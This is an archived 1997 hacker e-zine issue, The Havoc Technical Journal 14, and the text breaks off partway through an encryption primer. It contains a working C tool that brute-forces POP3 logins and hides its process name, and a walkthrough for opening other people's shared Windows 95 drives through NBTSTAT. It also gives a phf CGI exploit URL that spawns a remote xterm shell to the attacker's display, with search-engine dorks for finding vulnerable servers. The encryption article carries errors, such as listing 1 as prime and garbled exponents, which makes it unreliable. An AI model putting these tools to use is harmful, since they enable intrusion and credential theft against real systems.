home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / thtj / thtj14.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  112.5 KB  |  2,573 lines

  1.      ┌──────────────────────────────────────────────────────────────────┐
  2.      │Vol. 2 No. 2       The Havoc Technical Journal            Issue 14│▒
  3.      │                     - http://www.thtj.com -                      │▒
  4.      │       September 1, 1997 - A Havoc Bell Systems Publication       │▒
  5.      └──────────────────────────────────────────────────────────────────┘▒
  6.       ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
  7.  
  8. ═────────────────────────────────────────────────────────────────────────────═
  9.            
  10.           ·THTJ - Writing text files like they're going outta style·  
  11.                    ┌──────────────────────────────────────┐
  12.                 ·-=│THTJ───[14]────Contents────[14]───THTJ│=-·
  13.                    └──────────────────────────────────────┘
  14.                  Editorial..............................Scud-O
  15.                  Spreading the knowledge................KungFuFox 
  16.                  Pop3.c mail port hacker................memor
  17.                  Securing your WWWBoard.................Black Sol
  18.                  Hacking Win95 With NBTSTAT.............W3|rd
  19.                  More on cgi-bin holes..................]NiCK[
  20.                  Encryption for dumbasses...............t33
  21.                  More info on X.25 than the CIA has!....memor
  22.                  Beyond HOPE review.....................AlienPhreak
  23.                  Tatoo pager info and more..............memor   
  24.                  Help-a-phreak..........................THTJ
  25.                  Oddville, THTJ.........................Scud-O
  26.                  The News: HOPE, AOL Haxors, & SPAM!....KungFuFox
  27.                  Logs...................................THTJ
  28.                ────────────────────────────────────────────────
  29.                    ┌──────────────────────────────────────┐
  30.                    │  thtj.com is proud to now be hosting │
  31.                    │ global kOS - http://www.thtj.com/kOS/│
  32.                    │            check it out.             │
  33.                    └──────────────────────────────────────┘
  34. ═────────────────────────────────────────────────────────────────────────────═
  35. ┌─────────────────────────────────────────────────────┐
  36. │The Havoc Technical Journal - contacts & information │ 
  37. └─────────────────────────────────────────────────────┘
  38.  
  39.   - Editor in Chief : Scud-O, scud@thtj.com
  40.   - Assistant Editor : KungFuFox, mazer@cycat.com  
  41.   - Submissions Editor: Keystroke, keystroke@thepentagon.com
  42.   - thtj email address: thtj@thtj.com
  43.   - thtj website: http://www.thtj.com/
  44.   - thtj mailing address: PO BOX 448 Sykesville, MD 21784
  45.  
  46.   The Havoc Technical Journal Vol. 2, No. 2, September 1st, 1997.  
  47.   A Havoc Bell Systems Publication.  Contents Copyright (⌐) 
  48.   1997 Havoc Bell Systems Publishing.  All Rights Reserved.  
  49.   No part of this publication may be reproduced in whole or 
  50.   in part without the expressed written consent of Havoc 
  51.   Bell Systems Publishing.  [No copying THTJ, damnit.]
  52.   
  53.   The Havoc Technical Journal does in no way endorse the 
  54.   illicit use of computers, computer networks, and 
  55.   telecommunications networks, nor is it to be held liable 
  56.   for any adverse results of pursuing such activities.
  57.  
  58.   For information about using articles published in THTJ, send mail to:
  59.     E-mail: thtj@thtj.com
  60.     US-mail: THTJ c/o HBS, PO Box 448, Sykesville, MD 21784
  61. ═────────────────────────────────────────────────────────────────────────────═
  62. ┌──────────────────────────────────────┐
  63. │ Editorial by Scud-O                  │ 
  64. └──────────────────────────────────────┘
  65.      
  66.      I'm taking a break from writing an editorial this month because I've   
  67. been especially busy with THTJ for most of August, cya next month.
  68.                                                             Scud-O
  69.     ----------------------------------------------
  70.   /       ---/   --/  /   /  |  /------/   /    /
  71.  /---       /-----/------/-----/      /   /    /
  72. /----------/                         /--------/
  73.              -of Havoc Bell Systems-
  74.  
  75.          scud@thtj.com | http://www.thtj.com
  76.  
  77. ═────────────────────────────────────────────────────────────────────────────═
  78. ┌────────────────────────────────────────┐
  79. │ Spreading the knowledge - by KungFuFox │ 
  80. └────────────────────────────────────────┘
  81.  
  82. It's survived for 14 issues, the first 3 spoken of only in legend. It's 
  83. succeeded where others have failed. It's stood the test of time. It's past
  84. its first birthday. Hooray for THTJ. A lot goes into making a publication 
  85. like this, and even more goes into putting it out on time. Funny how that's
  86. not the norm in the world of ezines, coming out on time. I guess it's the
  87. pressure of a deadline that's scared people away from the idea. 
  88.  
  89. Taking a look at the booming industry of ezines out there, I can't help but 
  90. notice that not many of them make it very far. For whatever reason, they fall 
  91. below the horizon far sooner than they should. Maybe the initial motivation 
  92. to make the zine was no longer there, or maybe the editors didn't get enough 
  93. articles to keep publishing; something just didn't go right. They all started
  94. off with the same goal, to bring information to the public. I think it's 
  95. noble that people are still out there trying to spread the knowledge, because 
  96. I think that's what ezines are for. They help the community by giving them 
  97. the knowledge that they would have a great deal of trouble getting otherwise.
  98.  
  99. As I reflect on the maturity of THTJ, on the changes it's gone through over 
  100. time, I do feel a good deal of pride in its success. From its early days of 
  101. paper form, through its evolution as an ezine, and to the present point, its 
  102. message has stayed the same; spread the knowledge. We spread the knowledge 
  103. every month, with the seemingly endless stream of articles that are sent in 
  104. from everyday people like you, from the community. We sure as hell couldn't 
  105. survive without the help of our reader/writers. 
  106.  
  107. This zine has kept going because the idea of spreading the knowledge isn't 
  108. extinct, and hopefully it never will be. That's what freedom of speech is all
  109. about, isn't it? Not about burning flags, or dressing in drag, or whatever.
  110. It's about being able to exchange information without barriers, without  
  111. censors, without the challenge of fighting your allies to learn. If there 
  112. were no ezines, if nobody out there had the motivation to spread the 
  113. knowledge, if it was an every man for himself community, we'd be censoring
  114. ourselves by holding the knowledge away from the people who want it, who can
  115. use it. 
  116.  
  117. Zines like Phrack and PLA have kept the scene informed, and laughing, for
  118. the duration of this decade (and in the case of Phrack, for a good chunk of
  119. the 80s as well). It is their success that has brought many a newbie into the 
  120. scene, just because of the openness and freedom of knowledge exchange that 
  121. these zines have promoted. Though 2600 is not an ezine, and not free, it
  122. has kept the public informed for many years. It has also indirectly 
  123. influenced the ezine industry for some time now, forcing those who want the 
  124. knowledge to stay free to make their own ezines, and keep the knowledge 
  125. flowing. 
  126.  
  127. Many a zine have come and gone, making maybe 1, maybe 2 issues. And of those 
  128. many, perhaps 1 in 20 of them makes a 3rd, and a 4th, and keeps the knowledge 
  129. flowing, but just 1 out of 20 is all it takes to keep the scene alive. There
  130. are some newcomers out there, starting out like the many before them, and 
  131. they're continuing the tradition, taking over where others have left off.
  132. Zines like System Failure, Zero, Ocean County Phone Punx, and Confidence 
  133. Remains High. They all show promise, and I'm sure there are many more like 
  134. them that I don't even know about. It can only be hoped that this trend of 
  135. knowledge spreading never ends, and should it ever, by the hand of some 
  136. contemptuous hypocrite, we'll not be the disgraced for trying.
  137.  
  138. The Havoc Technical Journal is going to continue to spread the knowledge for
  139. as long as it can, but nothing lasts forever, and times do change. We're 
  140. aiming to better ourselves, to make this publication as informative, as 
  141. interesting, and as entertaining as possible. The opinions of our readers are
  142. the best way for us to judge our strengths, our weaknesses, to determine what
  143. it is we're doing right, and what it is we need to be doing. Flame us if 
  144. necessary, just let us know what you want to see, what you don't want to see
  145. and what it is you see that you think is really swell. Operators are standing
  146. by!
  147.  
  148. KungFuFox <mazer@cycat.com>
  149.  
  150. ═────────────────────────────────────────────────────────────────────────────═
  151. ┌────────────────────────────────────┐
  152. │ Pop3.c mail port hacker - by memor │ 
  153. └────────────────────────────────────┘
  154.  
  155. /*
  156.      A little pop3 "hacker" by memor 
  157.      
  158.      Sends a USER username and PASS username to a pop3 server on port 110  
  159.      read from a passwd file on the target server. (I guess that passwd
  160.      file is shadowed and you are trying to gain access to some joe accounts)
  161.      
  162.      Compile it with cc -o pop3 pop3.c
  163.      
  164.      Usage: pop3 server-ip passwdfile port(optional)
  165.      
  166.      Tested on linux 2.0.30
  167.  
  168. */
  169.  
  170.  
  171. /* Includes for File managing, String managing.. Default c commands, exit
  172.    commands, socket managing */
  173.  
  174. #include <stdio.h>
  175. #include <stdlib.h>
  176. #include <unistd.h>
  177. #include <string.h>
  178. #include <netdb.h>
  179. #include <sys/socket.h>
  180. #include <arpa/inet.h>
  181. #include <sys/types.h>
  182. #include <netinet/in.h>
  183.  
  184. /* Defining Global variables */
  185. /* Defining a socket, a string, 2 functions */
  186.  
  187. FILE *soc;
  188. char *str;
  189. int sock;
  190. void answer();
  191. void sending();
  192.  
  193. /* main routine */
  194.  
  195. int main(int argc, char *argv[])
  196. {
  197.  
  198. /* defining a for the users counter, strr as a string for containing username,
  199.    port, count as file counter, structure for socket */
  200.  
  201. int a;
  202. FILE *userfile;
  203. char *strr;
  204. char *ips;
  205. int count, port = 110;
  206. struct sockaddr_in ip;
  207.  
  208. /* space in the 3 strings.. */
  209.  
  210. str = (char *)malloc(100);
  211. strr = (char *)malloc(100);
  212. ips = (char *)malloc(100);
  213.  
  214. /* you need more arguments if you want it to work..  server port is not
  215.    needed cause pop is on port 110 */
  216.  
  217. if ( argc < 3  )
  218.      {
  219.                     printf("Usage: %s (ip of pop3 server) (userfile) (server port)\n", argv[0]);
  220.                 exit(1);
  221.           }
  222.           else
  223.                if ( argc > 2 ) 
  224.      {
  225.           if(argc > 3) port = atoi(argv[3]); /* if port argument defined */
  226.           userfile = fopen(argv[2],"r"); /* opening the userfile */
  227.           if(userfile == NULL )  /* is the userfile open? */
  228.                {
  229.                     printf("Userfile doesnt exist..\n");
  230.                     exit(1);
  231.                }
  232.      }
  233. /* argv[1] -> ips.. so i'll nuke argv [1] and the others argv for hiding all of that now :) */
  234. strcpy(ips,argv[1]);
  235.  
  236. /* now i hide all as some man using.. */
  237. sprintf(argv[0],"man        ");
  238. sprintf(argv[1],"               ");
  239. sprintf(argv[2],"               ");
  240. if(argc>3) sprintf(argv[3],"               ");
  241.  
  242.  
  243.  
  244.  do /* lets begin a loop for userfile reading */
  245.      /* open a socket for connecting */
  246.      {
  247.      if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */
  248.           {    
  249.                     perror("socket");
  250.                     exit(0); /* bye */
  251.                }
  252.      /* i need to read you as a file, miss socket */
  253.      soc=fdopen(sock, "r");
  254.  
  255.      /* fill target address structur */
  256.      ip.sin_family = AF_INET;
  257.           ip.sin_port = htons(port);
  258.           ip.sin_addr.s_addr = inet_addr(ips);
  259.           bzero(&(ip.sin_zero),8);
  260.      
  261.      
  262.      /* counters are 0 now.. but in a few ? ;) */
  263.      a=0;
  264.      count=0;
  265.      do   /* lets begin to get an username */
  266.           {
  267.  
  268.                strr[count]=fgetc(userfile); /* i catch a caracter in the file */
  269.                if(strr[count]==':') /* is it a ':' ? */
  270.                     {
  271.                     strr[count]='\0';
  272.                     a=1; /* it is a ':' so i'll forget to get the others caracters */
  273.                     }
  274.                if(strr[count]==13) strr[count]='\0';  /* it is a 13? ok.. i forget it too */
  275.           strr[count+1]='\0'; /* i make my string */
  276.           count++; /* counting for filling strr */
  277.           }
  278.      while(strr[count-1]!=10 && strr[count-1]!=EOF); /* stop if we find the lf or end of file caracters */
  279.           
  280.           if(strr[count-1]!=EOF && strlen(strr)>1) /* is my username > 1 caracter and am i not at the end of file ? */
  281.                {
  282.                     if(strr[count-1]==10) strr[count-1]='\0'; /* if i see a lf, i kill it*/
  283.                printf("Username attempt: ->%s<-\n",strr); /* what is the username trying */
  284.                sprintf(str,"USER %s\n",strr); /* copy the USER name in str */
  285.  
  286.                 /* connect to the pop3 server */
  287.                     if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 )  /* i cant connect it? */  
  288.                     {
  289.                               perror("connect");
  290.                          exit(1); /* bye bye .. :) */
  291.                     } /* so i can connect it that mean if i am here.. */
  292.                     else
  293.                     {
  294.                     /* server is talking.. */
  295.                          printf("Server.. hello..\n"); 
  296.                     answer(); /* please tell me what does the server says */
  297.                     printf("%s",str); /* now i send that USER name*/
  298.                     sending(); /* sending it.. */
  299.                     printf("Server is answering...");
  300.                     answer(); /* answer +OK from the server i guess */
  301.                     sprintf(str,"PASS %s\n",strr); /* i'll send now that PASS name i first fill str with it*/
  302.                     printf("%s",str);  /* ok i am ready to send it */
  303.                     sending(); /* sending it .. */
  304.                     printf("Server is answering...");
  305.                     answer(); /* i am receiving or a +ERR or a +OK i guess */
  306.                     printf("Ok finish for that ROUND.. \n"); 
  307.  
  308.                               /* finished that round*/
  309.  
  310.                               close(sock); /* closing that socket */
  311.  
  312.                           }
  313.  
  314.                }
  315.      }while(strr[count-1]!=EOF); /* im not at the end of file? so i continue */
  316.  
  317. }
  318.  
  319. /* sending string str */
  320.  
  321. void sending()
  322. {
  323. if ( send(sock, str, strlen(str), 0) < 0 )    /* can't i send str ? */
  324.      {
  325.                 perror("send");
  326.                 exit(1); /* i cant, so see you later */
  327.                } 
  328.  
  329. }
  330.  
  331. /* receiving caracters from the server */
  332.  
  333. void answer()
  334. {
  335. /* first.. a caracter is a char type.. */
  336. char ch; 
  337. do
  338.      { /* begin receiving caracters */
  339.      ch=getc(soc);
  340.           printf("%c",ch); /* please tell me what the server says */
  341.       } 
  342. while(ch!='\r'); /* ok i received a 13.. i guess he wont talk anymore now.. i hope */
  343. printf("\n");  
  344. }    
  345.  
  346. ═────────────────────────────────────────────────────────────────────────────═
  347. ┌───────────────────────────────────────┐
  348. │ Securing your WWWBoard - by Black Sol │ 
  349. └───────────────────────────────────────┘
  350.  
  351. Note: this is intended for those with their own websites;
  352. and use Matts WWWBoard CGI Script (http://www.worldwidemart.com/scripts)
  353. This is a perl script for a message board system, and as all programs,
  354. carries bugs which can be easily exploited. If you have this perl script
  355. running on your site, or plan on it, this text may be almost necessary for
  356. its safety.
  357.  
  358. Well, more and more sites these days appear to have the WWWBoard script which
  359. allows any person to post a message to your board, and let others read it. 
  360. This is considered a very convenient tool, but, as everything, has flaws and
  361. can be exploited. The first part of this is the security issue brought up 
  362. with the associated WWWAdmin program that goes with WWWBoard, and second, an 
  363. issue of editing the PERL Script itself for better security.
  364.  
  365. WWWAdmin Hole: |
  366. ---------------+
  367. The Exploit: 
  368. Used to remove messages from your board, WWWAdmin is used very commonly when
  369. a person uses WWWBoard. The default file name is
  370.                         /wwwboard_Directory/wwwadmin.cgi or www.admin.pl
  371.  
  372. You also must have a user name and password, which is stored in the 
  373. passwd.txt file. This can be a very big problem. The method WWWAdmin uses to 
  374. encrypt the password is the same as normal unix passwords, so therefore, 
  375. password crackers, like CrackerJack or John the Ripper can be used to crack 
  376. it.
  377.  
  378. The way it is displayed is this:
  379. WebAdmin:aepTOqxOi4i8U
  380. WebAdmin is the username and aepTOqxOi4i8U is the encrypted password. If you
  381. put this into unix format, lets say..
  382. WebAdmin:aepTOqxOi4i8U:275:15:Emmanuel Goldstein:/usr/homos/egold:/bin/csh
  383.  
  384. and then, used sturdy old John the Ripper to crack it, you'd come up with the
  385. password WebBoard. Then, you'd just have to go to lets say
  386. www.host.com/wwwboard/wwwadmin.cgi or wwwadmin.pl and use WebAdmin and
  387. WebBoard as the password, and you can edit and delete all their stuff..
  388.  
  389. How to Fix it:
  390. Don't panic because you might get hacked by some ego-maniac kid hacker who
  391. doesn't have anything better to do then ruin other peoples fun, this can be
  392. easily fixed. There are several methods, i suggest using all of them for
  393. maximum security.
  394.  
  395. Method #1 - Don't use the standard wwwadmin.pl or wwwadmin.cgi for the name.
  396. Use some random numbers and letters when uploading this to your server, for
  397. instance, make it wadawambrblah.cgi. This way, only you will even know where
  398. the admin script is, so even if they get the password they won't know where 
  399. to go!
  400.  
  401. Method #2 - Don't use the standard passwd.txt for the passwd file. Change it
  402. also to something random like sdihff.bla - NOTE - you must also make this
  403. change in the WWWAdmin script, under the location for your passwd file. More
  404. details in the WWWAdmin readme file..
  405.  
  406. Method #3 - As soon as you upload it, IMMEDIATLY change the username and
  407. password! And do not use common words, most words can be found in wordlists,
  408. which basically means, you can still get hacked..use random names, like
  409. ajgndnbvfd for the password, etc. etc., you get the point (i hope). Make it
  410. LONG and use numbers as well, like a4mg4msdfsd9as9.
  411.  
  412. Note - be sure to keep your passwords written down, so you can remember them!
  413.  
  414. Method #4 - When you change your password, make sure it is more then 8
  415. letters+numbers. Password crackers crack up to 8 characters, so, if your
  416. password is longer then that, and someone gets your password file; they can
  417. only crack the first 8 letters/numbers, and they can't get the rest of the
  418. password.
  419.  
  420. Method #5 - Modify your PERL script so only ip's from your ISP (internet
  421. service provider) can access the wwwadmin script, whatsoever. Note - more on
  422. this below!
  423.  
  424. Method #6 - Chmod your passwd text file and even wwwadmin cgi script so that
  425. nobody can access it, and then when you need to use it, you can chmod it back
  426. to world readable/executable.
  427.  
  428. For example, log in to your shell, and then do the following:
  429.  
  430. -+-
  431. cd wwwboard (wwwboard being the name of the dir everything is in)
  432. chmod o-rwx passwd.txt (passwd.txt being the name of the passwd file for
  433.                         wwwadmin)
  434. chmod o-x wwwadmin.cgi (wwwadmin.cgi being the name of the wwwadmin script
  435.                         file)
  436. -+-
  437.  
  438. That's all. now if someone tries to access your WWWAdmin or your password 
  439. file, they will get a Forbidden Access error. However, so will you. So, when 
  440. you want to use your wwwadmin script, go back to your shell and do this:
  441.  
  442. -+-
  443. cd wwwboard
  444. chmod o+rwx passwd.txt
  445. chmod o+x wwwadmin.cgi
  446. -+-
  447. Its as simple as that.
  448.                               
  449. Modifying the PERL Script for more security:  |
  450. ----------------------------------------------+
  451. In most situations, people using WWWBoard do not know PERL, the programming
  452. language that it is written in. Knowing PERL can benefit you greatly. What
  453. are some things you could do if you knew how to edit the perl script?
  454.  
  455. 1) Ban certain people from using your board
  456.  
  457. 2) Ban all people from a certain internet provider from using your board
  458.  
  459. 3) Stop other people from using your nickname/handle
  460.  
  461. 4) Record the IP, Internet Address, Web Browser, time and date, and the
  462.    message that person posted; to a file each time somebody posts.
  463.  
  464. 5) Change the background colors, background appearance, and the general
  465.    appearence, and layout of the board to YOUR liking.
  466.  
  467. 6) Display information such as a persons IP and web browser in their post.
  468.  
  469. 7) Require a username and password to make posts.
  470.  
  471. 8) Stop other people from accessing your WWWAdmin script.
  472.  
  473. Unfortunately, to describe how to actually DO those things it'd take another
  474. text in itself :) You can check out this site for some pointers with perl:
  475.  
  476. http://www.ora.com/catalog/pperl2/excerpt/ch01-01.htm
  477.  
  478. Until then, I can include one method you can use. It is pretty easy to
  479. include somebodies IP or host in a post. Start off with these two lines, in
  480. the top, with the other variables:
  481.  
  482. # Start perl sample
  483. $host = $ENV{'REMOTE_HOST'};
  484. $ip = $ENV{'REMOTE_ADDR'};
  485. # End perl sample
  486.  
  487.  
  488. Those two lines will put the persons IP and host into two little variables.
  489. Now, in the procedure where it writes to the html file, you can include those
  490. two variables to display the poster's info. The procedure to put this into is
  491. new_file If your unsure of where to put this, just look for a print NEWFILE
  492. "blah blah\n"; statement..you can look for where it says something like
  493. "posted by $name" or whatever, and you can just add $host or $ip into the
  494. line somewhere.
  495.  
  496. ═────────────────────────────────────────────────────────────────────────────═
  497. ┌───────────────────────────────────────┐
  498. │ Hacking Win95 With NBTSTAT - by W3|rd │ 
  499. └───────────────────────────────────────┘
  500.  
  501. Requirements for the hack to work:
  502. Windows 95 & the Victim must run NETBIOS and have "sharing" on their hard 
  503. drives.
  504.  
  505.    First type 'nbtstat -A x.x.x.x'
  506.  
  507.    If your lucky you'll get something like this.
  508.  
  509.         NetBIOS Remote Machine Name Table
  510.     Name               Type         Status
  511.  ---------------------------------------------
  512.  ^M0REBID       <00>  UNIQUE      Registered
  513.  VIRTUAL COMPUTE<00>  GROUP       Registered
  514.  ^M0REBID       <03>  UNIQUE      Registered
  515.  MAC Address = 44-45-53-54-00-00
  516.  
  517.    Remember the first UNIQUE name here.
  518.  
  519.    Now create 'lmhosts' in your windows dir.
  520.    it should look like this:
  521.  
  522. x.x.x.x ^M0REBID
  523.  
  524.    Then you purge nbtstat like this: 'nbtstat -r'
  525.  
  526.    Then goto Find -> Computers
  527.    on the Start Menu in Windows 95.
  528.    Type in the UNIQUE name and search.
  529.    Then if found , double click on the name , and if you get up a window with 
  530.    for example C and D .. you will have Access to his harddrives.. ;)
  531.  
  532.    You may now read his/her files ... and remember be creative... ;)
  533.    (But remember , some people might have sharing on..but with pwd!)   
  534.  
  535.    Mission Accomplished...
  536.  
  537.    Thankz to: iO and ^D-BL00D^ (my Co-prez in NHF)
  538.     
  539.    W3|rd - Prez. of Norwegian Hacker Force, and a Rebel X Hacker.  
  540.  
  541. ═────────────────────────────────────────────────────────────────────────────═
  542. ┌──────────────────────────────────────┐
  543. │ More on cgi-bin holes - by ]NiCK[    │ 
  544. └──────────────────────────────────────┘
  545.  
  546. 1 - The largest server database helps exploit phf
  547. *************************************************
  548.  
  549.      I have appointed: ALTA-VISTA ! :) yeah ! if you know the syntax of
  550.      this websearch well enough, you can succeed to have a list of more
  551.      than 3000 insecure servers with this method, simply by typing:
  552.  
  553.      http://altavista.digital.com/cgi-bin/query?pg=aq&what=web&fmt=.
  554.      &q=link%3A%22%2Fcgi-bin%2Fphf%22&r=&d0=&d1=
  555.      (type this all in on one line)
  556.  
  557.      Too easy! Isn't it? Also, you can modify it to search for php.cgi,
  558.      webgais, or others such as view-source...
  559.      
  560.  Note:  Sometimes, some servers won't work... but its just because the
  561.         database isn't updated every day.
  562.  
  563.  
  564. 2 - Other stuff to exploit websearchs
  565. *************************************
  566.  
  567.      I love the "Yellow Pages" of organizations, enterprises, or companies
  568.      like for instance Adminnet (www.adminet.com)... its filled with kewl
  569.      insecure web servers.. But the problem is that it's not very
  570.      interesting to scan manually... So, I wrote a little program to change
  571.      the html index of web servers into a list of exploitable servers for
  572.      phfscan or phpscan...
  573.  
  574.      Here is a little unix script:
  575.  
  576. --
  577. if [ $# = 0 ]
  578. then
  579. echo "Usage: html2list file.html" >&2
  580. exit 1
  581. cat $1 | grep '"http://' | tr '"' '\n' | grep '^http://' | cut -c8- |tr '/'
  582. '\n' |grep '\.' | grep -vi '\.html\|\.htm' |sort -u > $1.list
  583.         (one again, the last 2 lines need to be moved up together)
  584. --
  585.  
  586.  Note:  You can change/update it to a better way of scanning...
  587.  
  588.  
  589. 3 - Xterm with phf
  590. ******************
  591.  
  592.      Cracking the /etc/passwd ! ok... but there are better things to do
  593.      than waste your time. This attack consists of using Xterm with phf.
  594.      So, of course Xwindows must be present on the victim server, and you
  595.      must also be running it. While in Xwindows, write this: 'xhost
  596.      +www.victim.com' This is so your machine will accept connections
  597.      from victim.com... You can simply type 'xhost +', but it isn't really
  598.      secure... After, you must know what os www.victim.com is running,
  599.      so you can guess the path of Xterm.
  600.      
  601.      Here are some default Xterm paths for a few systems:
  602.      
  603.    AIX  : /usr/bin/X11/xterm
  604.    HP-UX: /usr/bin/X11/hpterm
  605.    Linux: /usr/X11R6/bin/xterm
  606.    SunOS: /usr/openwin/bin/xterm
  607.  
  608.      You can also use: 'find /usr -name xterm' or again 'whereis xterm' if
  609.      you have a shell on the machine.
  610.  
  611.      Finally, once you have found the path, you can run xterm via phf like:
  612.  
  613.      http://www.victim.com/cgi-bin/phf?Qname=a%0a/usr/openwin/bin/
  614.      xterm%20-display%20your.ip.com:0    (combine these two lines)
  615.  
  616.      Wait a few seconds... and whoop, a shell from the victims server will
  617.      appear in your Xwindow. :) Usually you become an user Nobody, but
  618.      sometimes, if the http daemon runs in a root shell, your become root,
  619.      or www sometimes.. The best thing is that your access is not logged
  620.      in the lastlog or wtmp... Very clean exploit !
  621.  
  622. Have PHFun ! :)
  623.  
  624.  
  625. -]NiCK[ <Modul1@usa.net>
  626.  
  627. ═────────────────────────────────────────────────────────────────────────────═
  628. ┌──────────────────────────────────────┐
  629. │ Encryption for dumbasses - by t33    │ 
  630. └──────────────────────────────────────┘
  631.  
  632. This article is intended for the people who know shit about encryption and 
  633. want a little more info about it.
  634. Hope it is useful.
  635.  
  636. Contents:
  637.  
  638. 1) What is Encryption?
  639. 2) How does Encryption work?
  640. 3) Brute Force Attack
  641. 4) Factoring Techniques
  642. 5) How Long Should a Key be?
  643. 6) Mounting an Attack
  644. 7) What is RSA?
  645. 8) What is DES?
  646. 9) What us Substitution?
  647. 10) What is Permutation?
  648.  
  649. 1) What is Encryption?
  650.  
  651. Encryption is simply the encoding of messages so that they cannot be read by 
  652. anyone who does not know how to decipher it. Governments and militaries have 
  653. been using codes to make their messages unreadable for many years. For 
  654. example, Caesar used a code to send military messages that was simply a shift 
  655. of the letters in the message three spaces down in the alphabet (an A becomes 
  656. a D). In cryptographic language this is known as a shift cypher.
  657.  
  658. The properties of a good cryptosystem are analogous to that of a normal lock. 
  659. A good system will have a very large key which is one of a large number of 
  660. keys (termed keyspace). It will also provide cyphertext (encrypted plaintext) 
  661. that appears random and stands up to known decryption attacks. Lastly, the 
  662. system should be suitable to the function for which it is intended. For 
  663. example, if a message is to remain secret for ten years or more, then the 
  664. system should take into account the future speed of computers and their 
  665. corresponding ability to attack the system. However, except for classified 
  666. government information (and maybe the Coca-Cola secret recipe), the reality 
  667. is that the relevance of most corporate information traveling over networks 
  668. is measured in days or weeks, and not decades.
  669.  
  670. 2) How Does Encryption Work?
  671.  
  672. Most encryption algorithms are based on the concept of complex mathematics 
  673. that work in only one direction and are generally based on the difficulty of 
  674. factoring very large numbers (keys) that are used for the encryption. These 
  675. large numbers are the product of large prime numbers. For example, anyone can 
  676. multiply two large prime numbers to obtain a result, but it is very difficult 
  677. for someone else to factor the large number to get back the two primes. This 
  678. is to say that mathematicians have yet to figure out a method for reversing 
  679. the math effectively. In this way, cryptography has been a secure method of 
  680. ensuring data confidentiality over computer networks.
  681.  
  682. 3) Brute Force Attack
  683.  
  684. The traditional method of breaking complex mathematical codes is through 
  685. brute-force attacks. This method is mathematically the easiest to perform, 
  686. but relies on vast computer processing power and is therefore the easiest to 
  687. defend against. A brute force attack tries every possible combination of keys 
  688. in order to unlock the encryption. Therefore, simply increasing the keyspace 
  689. will increase the amount of time needed to mount a brute force attack. The 
  690. reality is that a brute force attack is not a method which will ever be used 
  691. to decode cyphertext. Some quick calculations relating computer speeds and 
  692. key length will yield code-breaking times that exceed the expected life of 
  693. the universe.
  694.  
  695. The brute force method needs a sample of unencrypted text for the computer to 
  696. compare each decryption attempt with the actual text. This can be easily 
  697. obtained by knowing the nature of the messages being intercepted. For 
  698. example, all Microsoft word files will have a set of standard information 
  699. (bytes). How the decryption functions is easy. A key that is 128 bits long 
  700. will have 2128 possible values. Therefore, assuming that a very fast computer 
  701. that can try one million keys per second (consider that attempting a key 
  702. requires many instructions) it will take 225 years to try all of the 
  703. combinations with a 50% probability that it will be found in the first 224 
  704. years (remember that the universe is estimated to be 210 years old). (Bruce 
  705. Schneier, Applied Cryptography c.1995).
  706.  
  707. 4) Factoring Techniques
  708.  
  709. The more feasible form of attack will come from mathematicians refining 
  710. existing and developing new factoring techniques. These methods have been 
  711. used to show potential vulnerabilities in key-based encryption. However, they 
  712. still require massive computer power and long time-frames to break the 
  713. encryption. For example, a 129-digit number was factored at Bellcore labs in 
  714. 1994. This used the idle time on 1600 computers around the world, over a 
  715. period of 8 months using a computation called the quadratic sieve. The 
  716. authors estimated that they used .03% of the computing power of the Internet, 
  717. and believed that, with a highly publicized event, they could acquire 100,000 
  718. computers (approx. 2% of the Internet) without resorting to illegal or 
  719. unethical efforts such as an Internet worm.
  720.  
  721. 5) How Long Should a Key be?
  722.  
  723. The security of a cryptosystem depends on the strength of the algorithm and 
  724. the length of the key. The strength of the algorithm is difficult to 
  725. understand. However, understanding the methods of how the keys are decrypted 
  726. provides some clues as to it's strength. Knowing that all numbers can be 
  727. represented by a set of primes, encryption techniques rely on the difficulty 
  728. of factoring very large numbers into their respective primes. Lets look at a 
  729. very simplified example (cryptologists will undoubtedly cringe at the over
  730. simplification):
  731.  
  732. Suppose we have number n represented by x and y such that n = xy. The 
  733. quadratic sieve method works by first assuming that the numbers x and y are 
  734. close to one another on a number line. Successive steps either prove or 
  735. disprove this and search out the next numbers. Therefore, effective 
  736. encryption will create keys which are not close to one another. However, the 
  737. numbers cannot be so far apart as to have the one of x or y set to a very 
  738. small value. Effective encryption-based key generation will generate the keys 
  739. randomly, but also discard those keys which will be susceptible to 
  740. factor-based decryption systems.
  741.  
  742. What is involved in factoring a number? Anyone with a grade six education (or 
  743. a calculator) can easily multiply together two numbers. Anyone with a grade 9 
  744. education (and who remembers it) can factor a small number into its primes. A 
  745. prime number is any integer which is only divisible by itself and by 1. For 
  746. example, the sequence of the first seven prime numbers is: 1,2,3,5,7,11,13...
  747.  
  748. Lets say we express the number 24 as a set of its primes. This is simply 
  749. 2*2*2*3 = 24. Seems simple enough. Now, for those of you who think this is 
  750. easy, try entering the RSA factoring challenge and they will award you a 
  751. prize if you can do it on very large numbers (see the link at the end of this 
  752. document).
  753.  
  754. Another method called the general number field sieve can factor numbers 
  755. approximately 10 times faster than the quadratic field sieve, but is only 
  756. faster for larger numbers (greater than 110 digits). This method hasn't been 
  757. refined to the degree of the quadratic sieve but, with time will likely be 
  758. the method of choice for factoring large keys.
  759.  
  760. Factoring large numbers is very hard, but is becoming easier therefore 
  761. predictions based on security required for long term encryption cannot be 
  762. made. However, most people don't require their data to remain secure for 100 
  763. years. For example, information about stock market conditions may only be 
  764. relevant for a few days. Decisions based on that information need only be 
  765. protected for a few hours. At the end of the day everyone's trades become 
  766. known anyway. For a manufacturer, design specs. need only be kept secret 
  767. until product launch. For the longest-term secrets, such as military secrets, 
  768. key length should be based on the computing speeds at that time and the 
  769. projected future increases. Two general rules of thumb is that computing 
  770. power increases by a factor of 10 every five years and it is always best to 
  771. be cautious when making predictions. 
  772.  
  773. 6) Mounting an Attack
  774.  
  775. With respect to computing methods, a hardware or a software based attack can 
  776. be mounted. Hardware designers and cryptologists have designed machines 
  777. specifically for breaking codes which can greatly increase the rate at which 
  778. a code is broken. This involves hundreds of parallel processors working on
